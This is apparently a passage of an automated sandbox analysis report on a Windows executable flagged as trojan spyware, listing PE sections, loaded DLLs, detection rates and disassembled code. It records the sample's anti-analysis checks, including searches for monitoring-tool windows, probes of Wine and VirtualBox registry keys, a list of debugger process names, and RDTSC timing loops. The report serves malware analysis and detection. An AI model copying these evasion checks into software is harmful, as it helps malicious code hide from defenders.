Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B899200_2_00B89920
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BB3A700_2_00BB3A70
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00871BE00_2_00871BE0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BA1BD00_2_00BA1BD0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00AE9C800_2_00AE9C80
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B97CC00_2_00B97CC0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00845DB00_2_00845DB0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00855EB00_2_00855EB0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00843ED00_2_00843ED0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 009E7220 appears 93 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00875340 appears 50 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00874F40 appears 346 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0084CCD0 appears 55 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008375A0 appears 710 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00A0CBC0 appears 104 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0084CD40 appears 80 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008750A0 appears 101 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0083CAA0 appears 64 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008371E0 appears 47 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 009144A0 appears 76 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008373F0 appears 114 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0083C960 appears 37 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00874FD0 appears 289 times
Source: yqUQPPp0LM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: yqUQPPp0LM.exeStatic PE information: Section: ufmrywdo ZLIB complexity 0.9944913426650541
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008329FF
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: yqUQPPp0LM.exeVirustotal: Detection: 46%
Source: yqUQPPp0LM.exeReversingLabs: Detection: 65%
Source: yqUQPPp0LM.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: yqUQPPp0LM.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: kernel.appcore.dllJump to behavior
Source: yqUQPPp0LM.exeStatic file information: File size 4472832 > 1048576
Source: yqUQPPp0LM.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: yqUQPPp0LM.exeStatic PE information: Raw size of ufmrywdo is bigger than: 0x100000 < 0x1b7400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeUnpacked PE file: 0.2.yqUQPPp0LM.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ufmrywdo:EW;gqgzmhdq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ufmrywdo:EW;gqgzmhdq:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: yqUQPPp0LM.exeStatic PE information: real checksum: 0x4450c0 should be: 0x44872e
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: .idata
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: ufmrywdo
Source: yqUQPPp0LM.exeStatic PE information: section name: gqgzmhdq
Source: yqUQPPp0LM.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9B120 push eax; retf 0_3_01B9B12D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9B8A2 push FFFFFFB8h; iretd 0_3_01B9B8AB
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B97A7A push FFFFFFB8h; iretd 0_3_01B97A9D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BB41D0 push eax; mov dword ptr [esp], edx0_2_00BB41D5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008B2340 push eax; mov dword ptr [esp], 00000000h0_2_008B2343
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008EC7F0 push eax; mov dword ptr [esp], 00000000h0_2_008EC743
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0088E92D push es; retf 0_2_0088E92E
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00870AC0 push eax; mov dword ptr [esp], 00000000h0_2_00870AC4
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00891430 push eax; mov dword ptr [esp], 00000000h0_2_00891433
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008B39A0 push eax; mov dword ptr [esp], 00000000h0_2_008B39A3
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0088DAD0 push eax; mov dword ptr [esp], edx0_2_0088DAD1
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BB9F40 push dword ptr [eax+04h]; ret 0_2_00BB9F6F
Source: yqUQPPp0LM.exeStatic PE information: section name: ufmrywdo entropy: 7.956545640250439

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: F80AE4 second address: F80AF5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9093D6536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: F80AF5 second address: F80AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F679C second address: 10F67C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Ch 0x00000007 jmp 00007FE9093D6549h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F6A4C second address: 10F6A92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE908EE7106h 0x00000008 je 00007FE908EE7106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 pushad 0x00000012 jmp 00007FE908EE7115h 0x00000017 push ebx 0x00000018 jmp 00007FE908EE7113h 0x0000001d ja 00007FE908EE7106h 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F6A92 second address: 10F6A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F6A96 second address: 10F6A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F6FE4 second address: 10F6FFD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9093D6536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE9093D653Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9490 second address: 10F9495 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9495 second address: 10F94B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9093D6547h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F94B7 second address: 10F94CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7110h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F94CB second address: 10F94E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push esi 0x00000010 jbe 00007FE9093D653Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F94E8 second address: F80AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 mov esi, 72BF1912h 0x0000000b push dword ptr [ebp+12A307E9h] 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FE908EE7108h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b call dword ptr [ebp+12A31BC9h] 0x00000031 pushad 0x00000032 or dword ptr [ebp+12A31BB4h], eax 0x00000038 xor eax, eax 0x0000003a mov dword ptr [ebp+12A31BB4h], esi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 jc 00007FE908EE711Eh 0x0000004a jmp 00007FE908EE7118h 0x0000004f mov dword ptr [ebp+12A33867h], eax 0x00000055 mov dword ptr [ebp+12A3193Dh], ebx 0x0000005b jmp 00007FE908EE7110h 0x00000060 mov esi, 0000003Ch 0x00000065 jg 00007FE908EE7107h 0x0000006b stc 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 jnc 00007FE908EE711Ch 0x00000076 lodsw 0x00000078 clc 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jmp 00007FE908EE7119h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 cld 0x00000087 nop 0x00000088 push edi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9625 second address: 10F963B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FE9093D6536h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F963B second address: 10F964D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F971E second address: 10F9724 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9724 second address: 10F9756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FE908EE7106h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jl 00007FE908EE710Ch 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+12A31E06h] 0x0000001f mov edx, ebx 0x00000021 push 6490EE80h 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b pop edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9756 second address: 10F97B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6490EE00h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FE9093D6538h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b or edx, dword ptr [ebp+12A3386Bh] 0x00000031 push 00000003h 0x00000033 mov esi, ecx 0x00000035 push 00000000h 0x00000037 push 00000003h 0x00000039 mov esi, dword ptr [ebp+12A31B99h] 0x0000003f push 6708A68Dh 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007FE9093D653Ch 0x0000004c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F97B3 second address: 10F97EE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE908EE710Ch 0x00000008 jc 00007FE908EE7106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 58F75973h 0x00000017 jng 00007FE908EE710Ch 0x0000001d add dword ptr [ebp+12A31BD9h], edi 0x00000023 lea ebx, dword ptr [ebp+12BAC3B0h] 0x00000029 sub dword ptr [ebp+12A3193Dh], ebx 0x0000002f mov dword ptr [ebp+12A31BD9h], edx 0x00000035 xchg eax, ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F97EE second address: 10F9805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FE9093D653Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F98D6 second address: 10F98DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F98DC second address: 10F9907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE9093D653Bh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jg 00007FE9093D653Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FE9093D6536h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9907 second address: 10F9919 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE908EE7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9919 second address: 10F991D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F991D second address: 10F9997 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE908EE7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007FE908EE7119h 0x00000015 jmp 00007FE908EE7119h 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d mov dword ptr [ebp+12A3192Ch], ebx 0x00000023 popad 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 jnc 00007FE908EE710Ch 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+12A318F9h], edx 0x00000036 call 00007FE908EE7109h 0x0000003b pushad 0x0000003c je 00007FE908EE7108h 0x00000042 push eax 0x00000043 pop eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F9997 second address: 10F99E6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9093D6536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FE9093D6547h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jne 00007FE9093D6540h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jno 00007FE9093D653Eh 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F0883 second address: 10F0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F0889 second address: 10F0893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE9093D6536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F0893 second address: 10F0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10F0875 second address: 10F0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007FE9093D653Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1119817 second address: 111981B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111981B second address: 1119834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9093D6541h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1119834 second address: 1119838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1119C4B second address: 1119C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1119F08 second address: 1119F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE908EE7106h 0x0000000a jmp 00007FE908EE710Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1119F20 second address: 1119F37 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE9093D653Ah 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10ED389 second address: 10ED396 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE908EE7108h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
